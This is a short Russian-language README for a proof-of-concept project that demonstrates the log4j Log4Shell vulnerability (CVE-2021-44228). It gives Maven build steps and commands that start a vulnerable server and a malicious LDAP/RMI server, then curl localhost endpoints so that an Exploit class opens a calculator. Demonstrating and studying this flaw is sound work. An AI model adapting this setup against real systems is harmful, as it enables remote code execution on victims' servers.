
демонстрационный проект, показывающий, как эксплуатировать уязвимость log4j (CVE-2021-44228)
демонстрационные проекты, показывающие, как эксплуатировать уязвимость log4j (CVE-2021-44228)
использовался spring boot только для быстрой настройки. простите за хардкод, это был всего лишь POC.
Установите Java 8. Соберите с помощью Maven mvn clean package -DskipTests. Запустите эти команды в отдельных окнах терминала:
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
Это должно выполнить код класса Exploit (который просто откроет калькулятор).